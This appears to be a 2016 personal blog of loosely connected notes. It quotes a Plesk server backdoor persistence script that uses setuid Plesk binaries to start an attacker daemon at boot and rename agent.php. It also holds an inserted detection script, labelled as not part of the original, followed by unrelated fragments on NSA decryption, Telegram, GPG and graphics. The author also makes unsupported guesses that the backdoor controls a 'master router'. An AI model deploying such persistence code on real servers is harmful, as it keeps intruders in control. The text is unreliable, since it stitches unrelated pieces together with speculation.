Sunday, August 28, 2016
Saturday, August 27, 2016
Plesk backdoors, a very large number of servers compromised. (so industrial servers as Siemens??..I heard a story, did you hear the same story?)
Attackers, using the bug http://kb.parallels.com/en/112303
were able to get access to PLESK installations and install backdoors in
the systems. I’m using plural on backdoors, cause it’s not just one,
there are quite a few.
In some systems /dev/shm/persist was created with the following code:
# cat /dev/shm/persist
#!/bin/bash
export PATHS=”/opt/psa/bin /opt/psa/admin/bin /usr/local/psa/admin/bin /usr/local/psa/bin”
export MYSUDO=”"
for n in $PATHS; do export MYSUDO=”$MYSUDO $(ls $n/sw-engine-psa $n/sw-engine-plesk 2>/dev/null)”;done
for n in $MYSUDO; do test -u $n && export MYSUDO=$n;done
export PSAD=”"
for n in $PATHS; do export PSAD=”$PSAD $(ls $n/psadmd $n/psadmind 2>/dev/null)”;done
for PSADMD in $PSAD;do $MYSUDO “sed -i \”/daemon_name=sw-cp-serverd/a $PSADMD 2> \/dev\/null;\” /etc/init.d/psa”;$MYSUDO $PSADMD;done
$MYSUDO ‘mv /opt/psa/admin/htdocs/enterprise/control/agent.php /opt/psa/admin/htdocs/enterprise/control/old.php’
$MYSUDO ‘mv /usr/local/psa/admin/htdocs/enterprise/control/agent.php /usr/local/psa/admin/htdocs/enterprise/control/old.php’
In some cases, this file was hex encoded, in others in plain text form.
http://www.my-audit.gr/hacking/plesk-backdoors-a-very-large-number-of-servers-compromised/
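A defender-side check for the artifacts the quoted script leaves behind, as an added example that is not part of the original post or of Plesk's own tooling. The function name, the `PLESK_HITS` variable and the optional root-prefix argument (for checking a mounted disk image instead of the live system) are assumptions.

```shell
#!/bin/bash
# Added example: look for the traces of the /dev/shm/persist script quoted
# above. Pass a directory as $1 to check a mounted image; with no argument
# the live filesystem is checked. All names here are hypothetical helpers.

check_plesk_persist() {
    local root="${1:-}" hits=0 p ctl init

    # 1. The persistence script itself.
    if [ -e "$root/dev/shm/persist" ]; then
        echo "FOUND: $root/dev/shm/persist"
        hits=$((hits + 1))
    fi

    # 2. agent.php moved aside to old.php under either install prefix.
    for p in /opt/psa /usr/local/psa; do
        ctl="$root$p/admin/htdocs/enterprise/control"
        if [ -e "$ctl/old.php" ]; then
            echo "FOUND: $ctl/old.php (agent.php was renamed)"
            hits=$((hits + 1))
        fi
    done

    # 3. A psadmd/psadmind invocation on the line directly after
    #    daemon_name=sw-cp-serverd in the init script (what the sed call adds).
    init="$root/etc/init.d/psa"
    if [ -f "$init" ] && grep -A1 'daemon_name=sw-cp-serverd' "$init" \
            | grep -Eq '/(psadmd|psadmind)( |$)'; then
        echo "FOUND: appended daemon line in $init"
        hits=$((hits + 1))
    fi

    PLESK_HITS=$hits            # exposed for callers that want the count
    echo "indicators: $hits"
    [ "$hits" -eq 0 ]           # status 0 = none found, 1 = review the host
}
```

Since the post notes the file was sometimes hex encoded, a hit on the path matters more than the file's readable content.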
If I had to guess I would code paste this, meaning I would make this call...to then "string sys_get_temp_dir ( void )" to leave a token that then would control the master router :) (because the backdoor is in fact on the router) ehehehe
webpy-php-port /webphp/web.php
https://searchcode.com/codesearch/view/13403593/
Bullrun (stylized BULLRUN) is a clandestine, highly classified decryption program run by the United States National Security Agency (NSA).[1][2] The British Government Communications Headquarters (GCHQ) has a similar program codenamed Edgehill. According to the BULLRUN classification guide published by The Guardian, the program uses multiple sources including computer network exploitation,[3] interdiction, industry relationships, collaboration with other intelligence community entities, and advanced mathematical techniques.
Key size was reduced to 56 bits because IBM wanted to fit LUCIFER on a single chip. LUCIFER then became DES.
Then..how to beat NSA as a superpower and become as powerful as them?
parity check bit
https://www.mathworks.com/matlabcentral/newsreader/view_thread/93650
In an interview with the New York Times, Durov said the idea of the messenger service came to him after Russia's Federal Security Service demanded that he delete opposition communities from his Vkontakte social network. After the demands were refused special service agents tried putting pressure on the programmer and searched his apartment and that of his parents. The entrepreneur then understood that he doesn't have a safe channel for communicating with friends and family, and so he decided to create a secure messaging app.
What I understand here is that client and server both agree on replacing the path
Example:
[
{"op": "replace", "path": "/_AliceVersion", "value": 1},
{"op": "test", "path": "/_BobVersion", "value": 0},
//...
{"op": "replace", "path": "/some/where", "value": "something"}
]
https://github.com/PuppetJs/PuppetJs/wiki/Server-communication:-advanced-synchronization
I just missed school for 3 months!!!! How the hell am I gonna make the semester??? My father is gonna kill me!!!
and then...
Full guide on creating stateful Telegram bot
I have a couple of reasons to write this article. First of all I have a repository called ruby-telegram-bot-starter-kit, which contains a boilerplate for creating simple Telegram bots
https://medium.com/@MaximAbramchuk/full-guide-on-creating-statefull-telegram-bot-523def0a7930#.gh1xdlv5z
certain emails and chats were still indecipherable by the NSA database when they had been encrypted with the right tools....encryption also caused major problems for the agency, causing entire messages to disappear from the system, leaving only the message: "No decrypt available for this PGP encrypted message."
keyserver timed out when trying to add a GPG public key
...
For me it was required to add ENV statements into my docker file
....
This is usually caused by your firewall blocking the port 11371. You could unblock the port in your firewall. In case you don't have access to the firewall you could either:
1- Force it to use port 80 instead of 11371
http://unix.stackexchange.com/questions/75892/keyserver-timed-out-when-trying-to-add-a-gpg-public-key
Friday, August 26, 2016
I'm choosing this port analog X11 clock with Bezier curve hands
xinfocom-1.8m_1 -- Infocom game interpreter for X11
note:
http://stackoverflow.com/questions/28770110/how-to-prevent-loops-in-cubic-bezier-curves
Optical image encryption using a jigsaw transform for silhouette removal in interference-based methods and decryption with a single spatial light modulator
https://www.osapublishing.org/ao/abstract.cfm?uri=ao-50-13-1805
Tkinter: Tkinter is the Python interface to the Tk GUI toolkit shipped with Python.
http://www.tutorialspoint.com/python/python_gui_programming.htm
Multi-Plane Light Conversion
http://www.cailabs.com/technology/
Ok...let me jump from concept to concept..to see if I convince you!
so how to read pixel values in a non-readable format?
2.
How do I decrypt an Adobe Triple DES ECB-mode encrypted password?
So as you may have heard, the Adobe user database with 130 million records was leaked recently
sprintf
Format data into string
How To Generate Random Numbers In Excel Worksheets
EasyFit – Distribution Fitting Made Easy
Multiple Information Hiding Using Circular Random Grids
The Color class is used to encapsulate colors in the default sRGB color space or colors in arbitrary color spaces identified by a {@link ColorSpace}
http://www.docjar.com/html/api/java/awt/Color.java.html
